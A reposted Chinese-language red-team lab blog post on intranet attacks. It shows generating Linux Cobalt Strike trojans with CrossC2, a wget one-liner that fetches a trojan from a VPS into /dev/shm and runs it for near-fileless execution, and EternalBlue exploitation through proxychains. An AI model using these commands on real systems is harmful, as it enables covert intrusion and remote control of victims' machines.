一些近來對內網攻防的思考

? 我知道我最近托更托了很久了,其實也不是小編懶啊

這小編也是一直在寫,但是遇到的問題比較多(我太菜了),所以一直拖著。

但是總不能不更吧? ?? 那就講一下進來的一些內網攻防的思考吧

1.CrossC2上線Linux到CS(成功)

我么眾所周知,CS是不能生成以及上線Linux的(再不配置插件的情況下),那么我們今天就帶大家來配一下這個上線cs的插件

我就去kali上演示啦(你們在VPS上也是一樣的,不過我VPS上已經配置好了,就不麻煩再配一次了)

我們先去github上下載這兩個文件

GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

然后我們先去解壓縮那個ZIP

然后我們去CS加載這兩個文件

這樣,我們的CS就配置好了,然后我們去生成Linux的木馬,找到另外的那個gen...linux的

先改權限,然后生成

./genCrossC2.Linux 你的VPS的ip VPS監聽器的端口 null null Linux x64 木馬名字

所以我就這么寫咯

./genCrossC2.Linux 192.168.246.170 9191 null null Linux x64 muma

這里可以看見它的支持版本是4.9-4.1 ,要注意版本噢

然后我們去配置CS的監聽器(只支持https 和tcp)

這個生成木馬我應該就不用教了吧,不過記得要和木馬對應IP和端口噢

然后就是去目標Linux上運行木馬了!!!

但是呢,就真無語了

cs非常的安靜

就連本地自己啟動都上線不了。。。。。。。

我真無語了,那就用VPS上線一下吧!!!

還是先創建監聽器,然后生成🐎

丟到目標服務器上去運行

可以看見兩臺機器都能上線,看來以后還是用VPS吧!!!

2.Bash無文件落地??

我們眾所周知,Windos最出名的無文件落地,一定是powershell無文件落地(當然還有別的)

但是Linux呢??? 那肯定得有對應的無文件落地的啦!!! 下面這個連接講的很詳細

blogs/持久控制/Linux/Linux下的無文件攻擊.md at master · aplyc1a/blogs · GitHub

這些方法好是好,但是對于腳本小子不友好!!! 假如我現在有一個Linux的馬,然后又是腳本小子呢??

? ? ::: 我也想無文件啊!!!

那么就有接下來的命令

wget -U O -O - http://公網VPS/木馬 > /dev/shm/木馬 && chmod +x /dev/shm/木馬 && /dev/shm/木馬 && rm -f /dev/shm/木馬
  1. 使用 wget 命令從公網VPS的地址下載文件。
  2. > 符號將下載的文件內容輸出到 /dev/shm/木馬?文件中。
  3. && 符號表示如果前一個命令執行成功,則繼續執行下一個命令。
  4. 使用 chmod 命令添加 /dev/shm/木馬?文件的執行權限。
  5. 使用 /dev/shm/木馬?命令執行該文件,這個文件可能是一個 shell 腳本或可執行文件。
  6. 最后,使用 rm -f 命令刪除 /dev/shm/木馬?文件。

這個命令下載的文件被保存在 /dev/shm 目錄下,該目錄是一個臨時文件系統,通常被用作內存文件系統,因此文件實際上是保存在內存中的。因此,即使在磁盤上刪除了文件,內存中仍然存在這個文件的拷貝,因此刪除磁盤上的文件不會影響正在內存中執行的程序。

所以你覺得這個算是無文件嗎?????

? ? ?::感覺似乎不算,畢竟還有有文件落地得(只不過達到了一種類似無文件得效果)

那么下面就來演示一下,現在VPS上面開一個http得服務

然后直接一句話bash無文件落地

wget -U O -O - http://VPS:6888/shell > /dev/shm/shell && chmod +x /dev/shm/shell && /dev/shm/shell && rm -f /dev/shm/shell

直接上線

然后我們去看一下是否真的無文件(看一下目錄下有沒有)

但是在內存中還是能看見得

3.永恒之藍shell進去會建立一個session?

以前我不是做過這樣的一個實驗嗎?? 掛著跳板機去打內網的機器,很多時候本地不成功!!

那么我們今天Wireshark的角度上去分析一下!!!!!?

首先是一臺Win7(存在永恒之藍)

然后就是一臺Server(也存在永恒之藍)

首先我的Kali是192.168.246.170,先把他放在同一網段來打一下先

然后我們再去打一下Win7

好,兩臺都是能打到的,那么,我們把Win7放在內網,winserver放在公網

然后win7就變成內網52這個網段

然后winserver是雙網卡,同時通兩個網

然后我們去Winserver上開一個socks5的隧道!!!

然后我用kali的proxychains去連接

然后我們用proxychains去啟動msf

果然打不成功,這個可能是因為虛擬機網絡搖曳的原因,然而,今天我想講的是另外一個東西

還是拿回我們原來的那個攻擊成功的機器,我們眾所周知,永恒之藍是通過別人開放的445端口進行攻擊的,那么他是通過445進行連接的嗎????

我們在進攻成功之后,就可以有一個meterpreter的界面,然后我們去看一下連接

我們不難發現,我們并不是通過445端口進行連接的,而是通過重新找了一個端口來連接我們的kali? 那么另外又一個問題來了,我們shell的時候,會建立一個新的連接嗎??(PORT)

于是我shell了進去,并且抓了一下數據包,我們不難發現,我們kali都是通過用的4444端口進行對win7的通信,并不存在說新建立了一個端口來通信!!! 那執行命令呢????

可以看到它的整個tcp流,也是沒有建立新的端口

所以我們就可以得到一個結論,只要我們能通過proxychains打到內網,那么就不用擔心會新建端口導致的流量不通!!!? ??

所以以上失敗的原因就是虛擬機搖曳!!!!!!

? ?

以上,就是一些暫時的想法了,寫完這篇,小編又要投身到另一篇csdn上了!!!!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/12447.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/12447.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/12447.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

用友網絡的危與機:2023年虧損約10億元,王文京面臨嚴肅拷問

“企業在新的產業浪潮來臨時,應該主動推進新階段的產品和業務創新,這樣才能夠在新的浪潮成為主流的時候,走到行業前面,否則就會從產業發展的潮流中掉下來”。用友網絡創始人王文京,曾用“沖浪理論”形容一家企業成功的…

Steam喜加一,限時免費領取《Machinika Museum》

《Machinika Museum》限時免費領取啦!這是一款燒腦解謎游戲,讓你挖掘神秘外星裝置的秘密。在這個非常特別的異星裝置博物館里,你將扮演一名研究員,負責解開各種機械謎題,探索背后的故事。 在這個未來世界,外…

MLP的代替:KAN

受柯爾莫哥洛夫-阿諾德表示定理的啟發,作者提出柯爾莫哥洛夫-阿諾德網絡(KAN)作為多層感知器(MLP)有前途的替代品。MLP 在節點(“神經元”)上具有固定的激活函數,而 KAN 在邊&#x…

自動化中遇到的問題歸納總結

1、動態元素定位不到 解決方法:盡量使用固定元素定位,如沒有固定元素,則采用絕對路徑進行定位,因為元素路徑是唯一且不變的 2、自動化腳本執行速度較慢 盡量使用css方法定位元素,使用等待時,少用sleep方…

C#中string.format的格式和用法

C#中string.format的格式和用法 第1部分 格式化數字 string str1 string.Format("{0:N1}",56789); //result: 56,789.0string str2 string.Format("{0:N2}",56789); //result: 56,789.00string str3 string.Format("{0:…

Kubernetes 文檔 / 概念 / 容器 / 容器環境

Kubernetes 文檔 / 概念 / 容器 / 容器環境 此文檔從 Kubernetes 官網摘錄 中文地址 英文地址 容器環境 Kubernetes 的容器環境給容器提供了幾個重要的資源: 文件系統,其中包含一個鏡像 和一個或多個的卷容器自身的信息集群中其他對象的信息 容器信…

[筆記] srlua庫編譯

文章目錄 前言一、環境二、編譯過程2.1 gcc安裝2.2 編譯lua2.3 編譯srlua庫 三、測試srlua庫參考總結 前言 一、環境 centos7.9 gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) lua5.1源碼 srlua 源碼 二、編譯過程 2.1 gcc安裝 yum install gcc這里gcc安裝過程和環…

蘋果電腦卡頓反應慢怎么辦 蘋果電腦卡頓嚴重解決方法 mac電腦太卡了怎么辦

作為Mac用戶,你是否正在經歷或者曾經遭遇過電腦卡頓、反應慢的困擾?這可能是由于多種原因導致的,包括自啟動程序過多、系統與應用未及時更新、內存管理不當等。今天和你一起來探討下,蘋果電腦卡頓反應慢時怎么辦。希望能夠幫助你解…

KBPC5010-ASEMI電源控制柜專用KBPC5010

編輯:ll KBPC5010-ASEMI電源控制柜專用KBPC5010 型號:KBPC5010 品牌:ASEMI 封裝:KBPC-4 正向電流(Id):50A 反向耐壓(VRRM):1000V 正向浪涌電流&#x…

FreeRTOS中的動態內存管理(heap_1、heap_2、heap_3、heap_4)

FreeRTOS 提供了多種動態內存分配方案,這些方案通過不同的內存管理器(heap managers)實現,主要位于 FreeRTOS/Source/portable/MemMang 目錄下。以下是幾種常見的動態內存分配方案: heap_1 特點: 簡單性…

大數據可視化實驗(四):Excel數據可視化

目錄 一、實驗目的... 1 二、實驗環境... 1 三、實驗內容... 1 1)excel函數應用.. 1 2)數據透視圖繪制... 3 四、總結與心得體會... 5 一、實驗目的 1)掌握函數和公式的原理 2)掌握在單元格或編輯欄中直接輸入帶函數的公式…

kafka學習筆記04(小滴課堂)

Kafka的producer生產者發送到Broker分區策略講解 Kafka核心API模塊-producer API講解實戰 代碼: ProducerRecord介紹和key的作用 Kafka核心API模塊-producerAPI回調函數實戰 producer生產者發送指定分區實戰 我們設置5個分區。 我們指定分區。 重新指定一個分區&am…

業務上云--從Container+BuildKitd打鏡像到在Kubernetes上部署LNMP

一、背景 在基于kubeasz部署kubernetes高可用集群-CSDN博客文章部署的kubernetes集群上部署LNMP 1.1、Kubernetes環境 1.2、Harbor環境 【docker基礎】使用Harbor搭建私有倉庫-docker-compose使用示例--第二周作業_harbor docker-compose-CSDN博客 Harbor環境升級&#xff…

第 5 篇 : 多節點Netty服務端(可擴展)

說明 前面消息互發以及廣播都是單機就可以完成測試, 但實際場景中客戶端的連接數量很大, 那就需要有一定數量的服務端去支撐, 所以準備虛擬機測試。 1. 虛擬機準備 1.1 準備1個1核1G的虛擬機(160), 配置java環境, 安裝redis和minio 1.2 準備6個1核1G的空虛擬機(161到166), …

Elasticsearch的使用

Elasticsearch 1、認識和安裝 Elasticsearch的官方網站如下: https://www.elastic.co/cn/elasticsearch Elasticsearch是由elastic公司開發的一套搜索引擎技術,它是elastic技術棧中的一部分。完整的技術棧包括: Elasticsearch&#xff1…

MySQL變量的定義與使用(二)

一、通過變量進行實際的操作 set cityNameRotterdam; SELECT * from city where Name cityName; 二、變量只能處理字符,并不能代替符號或者關鍵字進行使用 set cityName1Rotterdam; set cityName2Zaanstad; set cityName3Zwolle; SELECT * from city where Name…

2024CCPC全國邀請賽(鄭州)暨河南省賽

2024CCPC全國邀請賽(鄭州站)暨河南省賽 一銅一銀,雖不是線下第一次參賽但是第一次拿xcpc獎牌,還有個國賽獎真是不戳。感謝學長,感謝隊友! 雖然遺憾沒有沖到省賽金,不過還有icpc商丘&#xff08…

SpringBoot項目中使用Redis,Mybatis和JWT

在Spring Boot項目中,結合Redis,MyBatis和JWT的使用可以提供以下功能: Redis的作用: 1.緩存:Redis可以用作緩存存儲,提高應用程序的性能和響應速度。特別是對于頻繁讀取但不經常更新的數據,如配…

Milvus Cloud:打造向量數據庫的Airtable級體驗

向量數據庫Milvus Cloud是一種用于處理和存儲向量數據的數據庫,它通常用于機器學習、圖像和視頻檢索、自然語言處理等領域。要將其升級為類似Airtable那樣易用且一體化的系統,需要考慮以下幾個關鍵方面: 1. 用戶界面(UI)設計 Airtable之所以用戶友好,很大程度上歸功于其直…

整型進制轉換

整型常量的不同進制表示 計算機中只能存儲二進制數,即0和1,而在對應的物理硬件上則是高,低電平。為了更方便地觀察內存中的二進制情況,除我們正常使用的十進制數外,計算機還提供了十六進制數和八進制數。 下面介紹不…